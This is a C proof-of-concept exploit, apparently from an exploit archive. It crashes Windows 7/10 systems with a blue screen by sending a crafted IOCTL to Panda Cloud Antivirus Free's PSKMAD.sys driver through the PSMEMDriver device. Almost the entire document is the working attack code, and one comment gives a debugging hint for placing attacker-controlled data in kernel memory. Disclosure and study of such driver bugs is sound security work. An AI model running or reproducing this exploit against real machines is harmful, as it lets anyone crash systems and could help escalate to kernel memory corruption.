|
/* # Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service # Date: 2017-04-29 # Exploit Author: Peter baris # Vendor Homepage: http://www.saptech-erp.com.au # Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en # Version: 18.0 # Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64 # CVE : requested */ #include "stdafx.h" #include <stdio.h> #include <Windows.h> #include <winioctl.h> #define DEVICE_NAME L"\\\\.\\PSMEMDriver" LPCTSTR FileName = (LPCTSTR)DEVICE_NAME; HANDLE GetDeviceHandle(LPCTSTR FileName) { HANDLE hFile = NULL; hFile = CreateFile(FileName, GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, NULL, 0); return hFile; } int main() { HANDLE hFile = NULL; PVOID64 lpInBuffer = NULL; ULONG64 lpBytesReturned; PVOID64 BuffAddress = NULL; SIZE_T BufferSize = 0x800; printf("Trying the get the handle for the PSMEMDriver device.\r\n"); hFile = GetDeviceHandle(FileName); if (hFile == INVALID_HANDLE_VALUE) { printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError()); return 1; } // Allocate memory for our buffer lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (lpInBuffer == NULL) { printf("VirtualAlloc() failed. \r\n"); return 1; } BuffAddress = (PVOID64)(((ULONG64)lpInBuffer)); *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag??? BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4)); *(PULONG64)BuffAddress = (ULONG64)0x42424242; BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8)); RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41); DeviceIoControl(hFile, 0xb3702c38, lpInBuffer, NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory NULL, NULL, &lpBytesReturned, NULL); /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/ printf("Cleaning up.\r\n"); VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE); CloseHandle(hFile); printf("Resources freed up.\r\n"); return 0; }
|
|
|